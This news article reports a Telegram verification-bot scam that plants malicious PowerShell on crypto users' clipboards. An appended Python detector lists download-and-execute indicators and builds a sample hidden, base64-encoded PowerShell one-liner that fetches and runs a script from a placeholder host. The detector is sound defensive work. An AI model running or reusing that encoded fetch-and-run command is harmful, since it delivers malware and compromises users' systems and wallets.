The crypto industry is growing daily, and so are scammers and bad actors. Recent findings reveal a new evolution in crypto scams and phishing activities, with cyber criminals now combining malware with social engineering attacks.
Web3 anti-scam firm Scam Sniffer revealed in a series of tweets that one of the new sophisticated attacks is targeting crypto users through fake Telegram groups. The scammers impersonate crypto influencers on X and use malicious bots for verification.
Crypto Scammers Target Telegram Users
The attackers first create multiple fake X accounts mimicking crypto influencers. Then, they comment on the posts of legitimate influencers, inviting users to join their exclusive Telegram groups for alpha and investment insights.
Scam Sniffer has noted a surge in X impersonations and a major rise in fake crypto accounts, with daily numbers going above 300. The figure hovered around 160 in November. In fact, two victims have already lost more than $3 million from clicking the malicious links shared by these fake accounts.
Crypto users who click on the Telegram group invites posted by the fake accounts are prompted to verify through a malicious bot dubbed “OfficiaISafeguardBot.” The bot rushes users through the process by giving them very short verification windows.
During the verification process, the bot secretly injects malicious PowerShell code into the victim’s clipboard. PowerShell is a high-level scripting language that lets system administrators automate actions and configurations. When executed, the malicious code can download and run malware that compromises the victim’s system and crypto wallets.
While Scam Sniffer only identified two users who lost millions by clicking on malicious X links, the firm disclosed that many users have fallen victim to these sophisticated Telegram attacks. There have also been cases where scammers stole users’ private keys via malicious links.
Protection Tips
Although VirusTotal, an online service that analyzes suspicious links to detect malware and malicious content, has flagged the Telegram malware as a scam, Scam Sniffer has offered tips for users to protect themselves.
The protection tips include thoroughly verifying official channels, never executing unknown commands, and refraining from running arbitrary code. Users should also be wary of time-pressured verification processes and avoid installing unknown software. Additionally, hardware wallets are recommended because they store users’ cryptocurrencies more securely offline.
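The "never execute unknown commands" tip can be backed by an automated check on text that a verification page or bot has placed on the clipboard. The following Python is an added example, not code from Scam Sniffer or the original article; the indicator list and function names are assumptions chosen for illustration, and the check also decodes PowerShell's base64 `-EncodedCommand` form so a hidden download is still seen.

```python
import base64
import re

# Heuristic indicators of a download-and-run PowerShell one-liner. The list is
# an assumption of this example; it is not taken from Scam Sniffer's report.
INDICATORS = {
    "powershell_launch": re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I),
    "hidden_window": re.compile(r"(?<!\w)-w[a-z]*\s+(?:hidden|1)\b", re.I),
    "download": re.compile(
        r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|"
        r"DownloadFile|Start-BitsTransfer)\b", re.I),
    "dynamic_exec": re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I),
}
# -EncodedCommand and its abbreviations (-e, -enc, ...) followed by base64.
ENCODED = re.compile(r"(?<!\w)-e[a-z]*\s+([A-Za-z0-9+/]{16,}={0,2})", re.I)


def decode_encoded_command(blob):
    """PowerShell expects base64 over UTF-16LE text; return it or None."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan(text):
    """Return indicator names found in text and in any decoded payload."""
    found = {name for name, rx in INDICATORS.items() if rx.search(text)}
    for match in ENCODED.finditer(text):
        decoded = decode_encoded_command(match.group(1))
        if decoded is not None:
            found.add("encoded_command")
            found |= scan(decoded)  # look inside the hidden command too
    return found


def should_block(text):
    """Block when the text hides its content or fetches code and runs it."""
    found = scan(text)
    hides = found & {"encoded_command", "hidden_window"}
    return bool(hides) or {"download", "dynamic_exec"} <= found


if __name__ == "__main__":
    # Constructed sample; example.invalid is a reserved, non-resolving name.
    inner = "iex (irm https://example.invalid/verify.ps1)"
    blob = base64.b64encode(inner.encode("utf-16-le")).decode()
    sample = f"powershell -w hidden -enc {blob}"
    print(sorted(scan(sample)), should_block(sample))
```

The patterns are heuristics and will miss obfuscated variants, so a match is a reason to stop and a clean result is not proof that a command is safe.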